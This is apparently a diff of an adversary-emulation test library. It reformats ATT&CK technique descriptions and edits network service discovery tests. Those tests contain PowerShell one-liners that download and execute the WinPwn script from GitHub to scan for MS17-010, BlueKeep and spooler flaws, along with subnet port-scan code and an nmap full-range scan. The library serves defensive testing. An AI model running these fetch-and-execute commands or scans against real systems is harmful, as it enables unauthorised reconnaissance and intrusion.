+On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show users` and `show ssh` can be used to display users currently logged into the device.(Citation: show_ssh_users_cmd_cisco)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)
+
+</blockquote>
 
 ## Atomic Tests
 

atomics/T1036.003/T1036.003.md

@@ -1,6 +1,10 @@
 # T1036.003 - Masquerading: Rename System Utilities
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1036/003)
-<blockquote>Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities adversaries are capable of abusing. (Citation: LOLBAS Main Site) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename <code>rundll32.exe</code>). (Citation: Elastic Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)</blockquote>
+<blockquote>
+
+Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities adversaries are capable of abusing. (Citation: LOLBAS Main Site) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename <code>rundll32.exe</code>). (Citation: Elastic Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)
+
+</blockquote>
 
 ## Atomic Tests
 

atomics/T1036.003/src/T1036.003_masquerading.vbs

@@ -0,0 +1 @@
+Wscript.Quit

atomics/T1036.004/T1036.004.md

@@ -1,8 +1,12 @@
 # T1036.004 - Masquerading: Masquerade Task or Service
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1036/004)
-<blockquote>Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description.(Citation: TechNet Schtasks)(Citation: Systemd Service Units) Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones.
+<blockquote>
 
-Tasks or services contain other fields, such as a description, that adversaries may attempt to make appear legitimate.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Fysbis Dr Web Analysis)</blockquote>
+Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description.(Citation: TechNet Schtasks)(Citation: Systemd Service Units) Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones.
+
+Tasks or services contain other fields, such as a description, that adversaries may attempt to make appear legitimate.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Fysbis Dr Web Analysis)
+
+</blockquote>
 
 ## Atomic Tests
 

atomics/T1036.005/T1036.005.md

@@ -1,8 +1,12 @@
 # T1036.005 - Masquerading: Match Legitimate Name or Location
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1036/005)
-<blockquote>Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.
+<blockquote>
 
-Adversaries may also use the same icon of the file they are trying to mimic.</blockquote>
+Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.
+
+Adversaries may also use the same icon of the file they are trying to mimic.
+
+</blockquote>
 
 ## Atomic Tests
 

atomics/T1036.006/T1036.006.md

@@ -1,10 +1,14 @@
 # T1036.006 - Masquerading: Space after Filename
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1036/006)
-<blockquote>Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system.
+<blockquote>
+
+Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system.
 
 For example, if there is a Mach-O executable file called <code>evil.bin</code>, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to <code>evil.txt</code>, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to <code>evil.txt </code> (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed (Citation: Mac Backdoors are back).
 
-Adversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious.</blockquote>
+Adversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious.
+
+</blockquote>
 
 ## Atomic Tests
 

atomics/T1036.007/T1036.007.md

@@ -1,10 +1,14 @@
 # T1036.007 - Masquerading: Double File Extension
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1036/007)
-<blockquote>Adversaries may abuse a double extension in the filename as a means of masquerading the true file type. A file name may include a secondary file type extension that may cause only the first extension to be displayed (ex: <code>File.txt.exe</code> may render in some views as just <code>File.txt</code>). However, the second extension is the true file type that determines how the file is opened and executed. The real file extension may be hidden by the operating system in the file browser (ex: explorer.exe), as well as in any software configured using or similar to the system’s policies.(Citation: PCMag DoubleExtension)(Citation: SOCPrime DoubleExtension) 
+<blockquote>
+
+Adversaries may abuse a double extension in the filename as a means of masquerading the true file type. A file name may include a secondary file type extension that may cause only the first extension to be displayed (ex: <code>File.txt.exe</code> may render in some views as just <code>File.txt</code>). However, the second extension is the true file type that determines how the file is opened and executed. The real file extension may be hidden by the operating system in the file browser (ex: explorer.exe), as well as in any software configured using or similar to the system’s policies.(Citation: PCMag DoubleExtension)(Citation: SOCPrime DoubleExtension) 
 
 Adversaries may abuse double extensions to attempt to conceal dangerous file types of payloads. A very common usage involves tricking a user into opening what they think is a benign file type but is actually executable code. Such files often pose as email attachments and allow an adversary to gain [Initial Access](https://attack.mitre.org/tactics/TA0001) into a user’s system via [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) then [User Execution](https://attack.mitre.org/techniques/T1204). For example, an executable file attachment named <code>Evil.txt.exe</code> may display as <code>Evil.txt</code> to a user. The user may then view it as a benign text file and open it, inadvertently executing the hidden malware.(Citation: SOCPrime DoubleExtension)
 
-Common file types, such as text files (.txt, .doc, etc.) and image files (.jpg, .gif, etc.) are typically used as the first extension to appear benign. Executable extensions commonly regarded as dangerous, such as .exe, .lnk, .hta, and .scr, often appear as the second extension and true file type.</blockquote>
+Common file types, such as text files (.txt, .doc, etc.) and image files (.jpg, .gif, etc.) are typically used as the first extension to appear benign. Executable extensions commonly regarded as dangerous, such as .exe, .lnk, .hta, and .scr, often appear as the second extension and true file type.
+
+</blockquote>
 
 ## Atomic Tests
 

atomics/T1036/T1036.md

@@ -1,8 +1,12 @@
 # T1036 - Masquerading
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1036)
-<blockquote>Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
+<blockquote>
 
-Renaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site)</blockquote>
+Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
+
+Renaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site)
+
+</blockquote>
 
 ## Atomic Tests
 

atomics/T1037.001/T1037.001.md

@@ -1,8 +1,12 @@
 # T1037.001 - Boot or Logon Initialization Scripts: Logon Script (Windows)
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1037/001)
-<blockquote>Adversaries may use Windows logon scripts automatically executed at logon initialization to establish persistence. Windows allows logon scripts to be run whenever a specific user or group of users log into a system.(Citation: TechNet Logon Scripts) This is done via adding a path to a script to the <code>HKCU\Environment\UserInitMprLogonScript</code> Registry key.(Citation: Hexacorn Logon Scripts)
+<blockquote>
 
-Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. </blockquote>
+Adversaries may use Windows logon scripts automatically executed at logon initialization to establish persistence. Windows allows logon scripts to be run whenever a specific user or group of users log into a system.(Citation: TechNet Logon Scripts) This is done via adding a path to a script to the <code>HKCU\Environment\UserInitMprLogonScript</code> Registry key.(Citation: Hexacorn Logon Scripts)
+
+Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. 
+
+</blockquote>
 
 ## Atomic Tests
 

atomics/T1037.002/T1037.002.md

@@ -1,10 +1,14 @@
 # T1037.002 - Boot or Logon Initialization Scripts: Logon Script (Mac)
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1037/002)
-<blockquote>Adversaries may use a Login Hook to establish persistence executed upon user logon. A login hook is a plist file that points to a specific script to execute with root privileges upon user logon. The plist file is located in the <code>/Library/Preferences/com.apple.loginwindow.plist</code> file and can be modified using the <code>defaults</code> command-line utility. This behavior is the same for logout hooks where a script can be executed upon user logout. All hooks require administrator permissions to modify or create hooks.(Citation: Login Scripts Apple Dev)(Citation: LoginWindowScripts Apple Dev) 
+<blockquote>
+
+Adversaries may use a Login Hook to establish persistence executed upon user logon. A login hook is a plist file that points to a specific script to execute with root privileges upon user logon. The plist file is located in the <code>/Library/Preferences/com.apple.loginwindow.plist</code> file and can be modified using the <code>defaults</code> command-line utility. This behavior is the same for logout hooks where a script can be executed upon user logout. All hooks require administrator permissions to modify or create hooks.(Citation: Login Scripts Apple Dev)(Citation: LoginWindowScripts Apple Dev) 
 
 Adversaries can add or insert a path to a malicious script in the <code>com.apple.loginwindow.plist</code> file, using the <code>LoginHook</code> or <code>LogoutHook</code> key-value pair. The malicious script is executed upon the next user login. If a login hook already exists, adversaries can add additional commands to an existing login hook. There can be only one login and logout hook on a system at a time.(Citation: S1 macOs Persistence)(Citation: Wardle Persistence Chapter)
 
-**Note:** Login hooks were deprecated in 10.11 version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) </blockquote>
+**Note:** Login hooks were deprecated in 10.11 version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) 
+
+</blockquote>
 
 ## Atomic Tests
 

atomics/T1037.004/T1037.004.md

@@ -1,12 +1,16 @@
 # T1037.004 - Boot or Logon Initialization Scripts: Rc.common
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1037/004)
-<blockquote>Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify.
+<blockquote>
+
+Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify.
 
 Adversaries can establish persistence by adding a malicious binary path or shell commands to <code>rc.local</code>, <code>rc.common</code>, and other RC scripts specific to the Unix-like distribution.(Citation: IranThreats Kittens Dec 2017)(Citation: Intezer HiddenWasp Map 2019) Upon reboot, the system executes the script's contents as root, resulting in persistence.
 
 Adversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as IoT or embedded systems.(Citation: intezer-kaiji-malware)
 
-Several Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of [Launchd](https://attack.mitre.org/techniques/T1053/004). (Citation: Apple Developer Doco Archive Launchd)(Citation: Startup Items) This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.(Citation: Methods of Mac Malware Persistence) To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.(Citation: Ubuntu Manpage systemd rc)</blockquote>
+Several Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of [Launchd](https://attack.mitre.org/techniques/T1053/004). (Citation: Apple Developer Doco Archive Launchd)(Citation: Startup Items) This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.(Citation: Methods of Mac Malware Persistence) To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.(Citation: Ubuntu Manpage systemd rc)
+
+</blockquote>
 
 ## Atomic Tests
 

atomics/T1037.005/T1037.005.md

@@ -1,10 +1,14 @@
 # T1037.005 - Boot or Logon Initialization Scripts: Startup Items
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1037/005)
-<blockquote>Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.(Citation: Startup Items)
+<blockquote>
+
+Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.(Citation: Startup Items)
 
 This is technically a deprecated technology (superseded by [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)), and thus the appropriate folder, <code>/Library/StartupItems</code> isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), <code>StartupParameters.plist</code>, reside in the top-level directory. 
 
-An adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since StartupItems run during the bootup phase of macOS, they will run as the elevated root user.</blockquote>
+An adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since StartupItems run during the bootup phase of macOS, they will run as the elevated root user.
+
+</blockquote>
 
 ## Atomic Tests
 

atomics/T1039/T1039.md

@@ -1,6 +1,10 @@
 # T1039 - Data from Network Shared Drive
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1039)
-<blockquote>Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information.</blockquote>
+<blockquote>
+
+Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information.
+
+</blockquote>
 
 ## Atomic Tests
 

atomics/T1040/T1040.md

@@ -1,6 +1,8 @@
 # T1040 - Network Sniffing
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1040)
-<blockquote>Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
+<blockquote>
+
+Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
 
 Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.
 
@@ -8,7 +10,9 @@ Network sniffing may reveal configuration details, such as running services, ver
 
 In cloud-based environments, adversaries may still be able to use traffic mirroring services to sniff network traffic from virtual machines. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring)(Citation: GCP Packet Mirroring)(Citation: Azure Virtual Network TAP) Often, much of this traffic will be in cleartext due to the use of TLS termination at the load balancer level to reduce the strain of encrypting and decrypting traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring)(Citation: SpecterOps AWS Traffic Mirroring) The adversary can then use exfiltration techniques such as Transfer Data to Cloud Account in order to access the sniffed traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring)
 
-On network devices, adversaries may perform network captures using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `monitor capture`.(Citation: US-CERT-TA18-106A)(Citation: capture_embedded_packet_on_software)</blockquote>
+On network devices, adversaries may perform network captures using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `monitor capture`.(Citation: US-CERT-TA18-106A)(Citation: capture_embedded_packet_on_software)
+
+</blockquote>
 
 ## Atomic Tests
 

atomics/T1041/T1041.md

@@ -1,6 +1,10 @@
 # T1041 - Exfiltration Over C2 Channel
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1041)
-<blockquote>Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.</blockquote>
+<blockquote>
+
+Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.
+
+</blockquote>
 
 ## Atomic Tests
 

atomics/T1046/T1046.md

@@ -1,10 +1,14 @@
 # T1046 - Network Service Discovery
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1046)
-<blockquote>Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port and/or vulnerability scans using tools that are brought onto a system.(Citation: CISA AR21-126A FIVEHANDS May 2021)   
+<blockquote>
+
+Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port and/or vulnerability scans using tools that are brought onto a system.(Citation: CISA AR21-126A FIVEHANDS May 2021)   
 
 Within cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.
 
-Within macOS environments, adversaries may use the native Bonjour application to discover services running on other macOS hosts within a network. The Bonjour mDNSResponder daemon automatically registers and advertises a host’s registered services on the network. For example, adversaries can use a mDNS query (such as <code>dns-sd -B _ssh._tcp .</code>) to find other systems broadcasting the ssh service.(Citation: apple doco bonjour description)(Citation: macOS APT Activity Bradley)</blockquote>
+Within macOS environments, adversaries may use the native Bonjour application to discover services running on other macOS hosts within a network. The Bonjour mDNSResponder daemon automatically registers and advertises a host’s registered services on the network. For example, adversaries can use a mDNS query (such as <code>dns-sd -B _ssh._tcp .</code>) to find other systems broadcasting the ssh service.(Citation: apple doco bonjour description)(Citation: macOS APT Activity Bradley)
+
+</blockquote>
 
 ## Atomic Tests
 
@@ -30,6 +34,8 @@ Within macOS environments, adversaries may use the native Bonjour application to
 
 - [Atomic Test #11 - Remote Desktop Services Discovery via PowerShell](#atomic-test-11---remote-desktop-services-discovery-via-powershell)
 
+- [Atomic Test #12 - Port Scan using nmap (Port range)](#atomic-test-12---port-scan-using-nmap-port-range)
+
 
 <br/>
 
@@ -249,7 +255,6 @@ Start MS-RPRN RPC Service Scan using spoolvulnscan function of WinPwn
 
 
 ```powershell
-$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
 iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
 spoolvulnscan -noninteractive -consoleoutput
 ```
@@ -279,7 +284,6 @@ Search for MS17-10 vulnerable Windows Servers in the domain using powerSQL funct
 
 
 ```powershell
-$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
 iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
 MS17-10 -noninteractive -consoleoutput
 ```
@@ -309,7 +313,6 @@ Search for bluekeep vulnerable Windows Systems in the domain using bluekeep func
 
 
 ```powershell
-$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
 iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
 bluekeep -noninteractive -consoleoutput
 ```
@@ -339,7 +342,6 @@ Search for potentially vulnerable web apps (low hanging fruits) using fruit func
 
 
 ```powershell
-$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
 iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
 fruit -noninteractive -consoleoutput
 ```
@@ -424,7 +426,7 @@ The connection attempts to use a timeout parameter in milliseconds to speed up t
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| ip_address | IP-Address within the target subnet. Default is empty and script tries to determine local IP address of attacking machine. | string | |
+| ip_address | IP-Address within the target subnet. Default is empty and script tries to determine local IP address of attacking machine. A comma separated list of targe IPs is also accepted (useful to simulate a wider scan while only scanning key host e.g., honeypots) | string | |
 | port_list | Comma separated list of ports to scan | string | 445, 3389|
 | timeout_ms | Connection timeout in milliseconds | string | 200|
 
@@ -434,31 +436,56 @@ The connection attempts to use a timeout parameter in milliseconds to speed up t
 
 ```powershell
 $ipAddr = "#{ip_address}"
-if ($ipAddr -eq "") {
-    # Assumes the "primary" interface is shown at the top
-    $interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
-    Write-Host "[i] Using Interface $interface"
-    $ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
-}
-Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
-$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
-# Always assumes /24 subnet
-Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
+if ($ipAddr -like "*,*") {
+    $ip_list = $ipAddr -split ","
+    $ip_list = $ip_list.ForEach({ $_.Trim() })
+    Write-Host "[i] IP Address List: $ip_list"
 
-$ports = #{port_list}
-$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
+    $ports = #{port_list}
 
-foreach ($ip in $subnetIPs) {
-    foreach ($port in $ports) {
-      try {
-          $tcp = New-Object Net.Sockets.TcpClient
-          $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
-      } catch {}
-      if ($tcp.Connected) {
-          $tcp.Close()
-          Write-Host "Port $port is open on $ip"
-      }
+    foreach ($ip in $ip_list) {
+        foreach ($port in $ports) {
+            Write-Host "[i] Establishing connection to: $ip : $port"
+            try {
+                $tcp = New-Object Net.Sockets.TcpClient
+                $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
+            } catch {}
+            if ($tcp.Connected) {
+                $tcp.Close()
+                Write-Host "Port $port is open on $ip"
+            }
+        }
     }
+} elseif ($ipAddr -notlike "*,*") {
+    if ($ipAddr -eq "") {
+        # Assumes the "primary" interface is shown at the top
+        $interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
+        Write-Host "[i] Using Interface $interface"
+        $ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
+    }
+    Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
+    $subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
+    # Always assumes /24 subnet
+    Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
+
+    $ports = #{port_list}
+    $subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
+
+    foreach ($ip in $subnetIPs) {
+        foreach ($port in $ports) {
+            try {
+                $tcp = New-Object Net.Sockets.TcpClient
+                $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
+            } catch {}
+            if ($tcp.Connected) {
+                $tcp.Close()
+                Write-Host "Port $port is open on $ip"
+            }
+        }
+    }
+} else {
+    Write-Host "[Error] Invalid Inputs"
+    exit 1
 }
 ```
 
@@ -495,4 +522,50 @@ Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #12 - Port Scan using nmap (Port range)
+Scan multiple ports to check for listening ports with nmap
+
+**Supported Platforms:** Linux, macOS
+
+
+**auto_generated_guid:** 0d5a2b03-3a26-45e4-96ae-89485b4d1f97
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| host | Host(s) to scan. | string | 127.0.0.1|
+| port_range | Port range(s) to scan. | string | 0-65535|
+
+
+#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
+
+
+```sh
+nmap -Pn -sV -p #{port_range} #{host}
+```
+
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: Check if nmap command exists on the machine
+##### Check Prereq Commands:
+```sh
+if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi;
+```
+##### Get Prereq Commands:
+```sh
+(which yum && yum -y install epel-release nmap)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)||(which pkg && pkg install -y nmap)||(which brew && brew install nmap)
+```
+
+
+
+
 <br/>

atomics/T1046/T1046.yaml

@@ -131,7 +131,6 @@ atomic_tests:
   - windows
   executor:
     command: |-
-      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
       iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
       spoolvulnscan -noninteractive -consoleoutput
     name: powershell
@@ -142,7 +141,6 @@ atomic_tests:
   - windows
   executor:
     command: |-
-      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
       iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
       MS17-10 -noninteractive -consoleoutput
     name: powershell
@@ -153,7 +151,6 @@ atomic_tests:
   - windows
   executor:
     command: |-
-      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
       iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
       bluekeep -noninteractive -consoleoutput
     name: powershell
@@ -164,7 +161,6 @@ atomic_tests:
   - windows
   executor:
     command: |-
-      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
       iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
       fruit -noninteractive -consoleoutput
     name: powershell
@@ -204,7 +200,7 @@ atomic_tests:
   - windows
   input_arguments:
     ip_address:
-      description: IP-Address within the target subnet. Default is empty and script tries to determine local IP address of attacking machine.
+      description: IP-Address within the target subnet. Default is empty and script tries to determine local IP address of attacking machine. A comma separated list of targe IPs is also accepted (useful to simulate a wider scan while only scanning key host e.g., honeypots)
       type: string
       default: ""
     port_list:
@@ -216,33 +212,58 @@ atomic_tests:
       type: string
       default: "200"
   executor:
-    command: |
+    command: |-
       $ipAddr = "#{ip_address}"
-      if ($ipAddr -eq "") {
-          # Assumes the "primary" interface is shown at the top
-          $interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
-          Write-Host "[i] Using Interface $interface"
-          $ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
-      }
-      Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
-      $subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
-      # Always assumes /24 subnet
-      Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
-
-      $ports = #{port_list}
-      $subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
-
-      foreach ($ip in $subnetIPs) {
-          foreach ($port in $ports) {
-            try {
-                $tcp = New-Object Net.Sockets.TcpClient
-                $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
-            } catch {}
-            if ($tcp.Connected) {
-                $tcp.Close()
-                Write-Host "Port $port is open on $ip"
-            }
+      if ($ipAddr -like "*,*") {
+          $ip_list = $ipAddr -split ","
+          $ip_list = $ip_list.ForEach({ $_.Trim() })
+          Write-Host "[i] IP Address List: $ip_list"
+  
